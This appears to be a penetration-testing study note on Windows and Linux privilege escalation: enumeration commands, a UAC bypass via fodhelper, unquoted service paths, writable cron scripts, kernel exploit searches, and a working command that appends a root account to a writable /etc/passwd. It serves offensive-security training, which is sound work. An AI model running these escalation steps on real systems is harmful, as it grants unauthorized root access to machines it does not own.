18.PX-Privilege-Escalation

Elevate Privilege to root. ## Information Gathering ### Manual Enumeration #### Enumerating Users Identify high-privilege user ```powershell # Windows whoami net user <username> # get more info about the user net user # look at other users ``` ```bash # Linux whoami id # get more details cat /etc/passwd # view more users ``` Enumerating the Hostname ```bash hostname # display OS on linux ``` #### Enumerating the OS Version and Architecture ```powershell # Windows systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" ``` ```bash # Linux cat /etc/issue cat /etc/*-release uname -a # kernel version and architecture ``` #### Enumerating Running Processes and Services ```powershell # Windows tasklist /SVC ``` ```bash # Linux ps axu ``` #### Enumerating Networking Information ```powershell # Windows ipconfig /all route print netstat -ano # a for all tcp, n for numeric form, o for owner process id ``` ```bash # Linux ip a # tcp/ip configuration /sbin/route ss -anp # active network connection and listening port ``` #### Enumerating Firewall Status and Rules ```powershell # Windows netsh advfirewall show currentprofile netsh advfirewall firewall show rule name=all # show all firewall rules ``` ```bash # Linux # must have root privileges to list firewall info grep -Hs iptables /etc/* ``` #### Enumerating Schedules Tasks ```powershell # Windows schtasks /query /fo LIST /v # /query display tasks, /fo LIST to display output as list, /v for verbose output ``` ```bash # Linux # cron /etc/con.daily /etc/con.weekly cat /etc/crontab ``` #### Enumerating Installed Applications and Patch Levels ```powershell # Windows wmic product get name, version, vendor # only lists apps installed by windows installer wmic qfe get Caption, Description, HotFixID, InstalledOn # system-wide update ``` ```bash # Linux dpkg -l ``` #### Enumerating Readable/Writable Files and Directories ```powershell # Windows accesschk.exe -uws "Everyone" "C:\Program Files" # Search for all files that can be modified by the member of the "Everyone" group Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"} ``` ```bash # Linux # every directory writable to current user find / -writable -type d 2>/dev/null ``` #### Enumerating Unmounted Disks ```powershell # Windows mountvol # list all mounted drives and connected but not mounted ones ``` ```bash # Linux mount cat /etc/fstab /bin/lsblk ``` #### Enumerating Device Drivers and Kernel Modules ```powershell # Windows powershell driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path # get version number Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"} ``` ```bash # Linux lsmod /sbin/modinfo <specific driver> ``` **After finding the versions of drivers, we can find exploits targeting the driver** #### Enumerating Binaries That AutoElevate Reveal OS specific shortcuts to privilege escalation ```powershell # Windows # check status of always installed elevated registry setting reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer ``` ```bash # Linux find / -perm -u=s -type f 2>/dev/null ``` ## Automated Enumeration Manual Enumeration is very complicated. ```powershell # Windows c:\Tools\privilege_escalation\windows-privesc-check-master>windows-privesc-check2.exe -h windows-privesc-check2.exe --dump -G ``` ```bash # Linux ./unix-privesc-check ./unix-privesc-check standard output.txt grep "writable config" -A 8 output.txt ``` ## Windows Privilege Escalation Examples ### Understanding Windows Privileges and Integrity Levels Windows use objects called **Access Tokens** to control the OS operation/permission a user can perform. ### Introduction to User Account Control (UAC) Access control system that forces applications to run in the context of a non-administrative account until an administrator authorize elevated access. When a non-admin user tries to perform any operation that needs admin privileges, the user would be prompted with a credential. An admin simply needs to confirm in the same scenario. However, an admin has 2 different levels of integrity token. To do things like changing password, it is required for admin-user to switch to high integrity level. ```powershell whoami /group # view integrity level powershell.exe Start-Process cmd.exe -Verb runAs # change integrity level ``` ### User Account Control Bypass: Case Study `C:\Windows\System32\fodhelper.exe`: a microsoft support app that runs in high integrity, in charge of language changes in OS. Goal: run command in high integrity. #### View manifest (XML containing info about how OS should handle a program when it's started) ```powershell cd C:\Tools\privilege_escalation\SysinternalsSuite sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe ``` ... ### Insecure File Permissions: Serviio Case Study Installed applications has control of the permissions over its files. If some service is readable/writable to all users or current user, then we can replace the service executable with some malicious code. When service restarts, the malicious code is executed. If cannot restart, then shutdonw/restart the machine. The next time it boots up, the malicious code should be executed. Maliciou code could be adding admin user. ### Leveraging Unquoted Service Paths If a path contains space and is not quoted, we could add a executable file in one of the intermediate directories to trick the system to execute is. For example, `C:\Program Files\My Program\My Service\service.exe` The path would be interpreted and executed in this order, if exists: 1. `C:\Program.exe` 2. `C:\Program Files\My.exe` 3. `C:\Program Files\My Program\My.exe` 4. `C:\Program Files\My Program\My Service\service.exe` The target is to execute the fourth path, but if we can add `My.exe` to `C:\Program Files\My Program` as (3), then (3) would be executed first. ### Windows Kernel Vulnerabilities: USBPcap Case Study Relies on kernel driver vulnerability. ```powershell systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" # find system info driverquery /v # list drivers ``` ## Linux Privilege Escalation Examples ### Understanding Linux Privileges Most resources, such as files, directories, devices, network communications are represented as files in the file systems, and each file has 3 types of permissions: read, write and execute. ### Insecure File Permissions: Cron Case Study Inspect cron log for running jobs: `grep "CRON" /var/log/cron.log` If some executable to be executed has unrestricted permissions, then we can modify the content of the script. Add a reverse shell to the script. ### Insecure File Permissions: /etc/passwd Case Study If we can write to `/etc/passwd`, we can add an account. `openssl passwd evil` ```bash openssl passwd evil # generate hash for password # > 3ZpVEg3djUeto # Then add the new account info in the right format to /etc/passwd echo "root2:3ZpVEg3djUeto:0:0:root:/root:/bin/bash" >> /etc/passwd # 0:0: are user and group ids, 0 means superuser su root2 # switch user to verify if account is added id # check user id and group id ``` ### Linux Kernel Vulnerabilities: Case Study ```bash cat /etc/issue # see message/system identification to be printed before login prompt uname r # kernel arch x86_64 # architecture ``` ```bash searchsploit linux kernel ubuntu 16.04 # search for existing exploits ```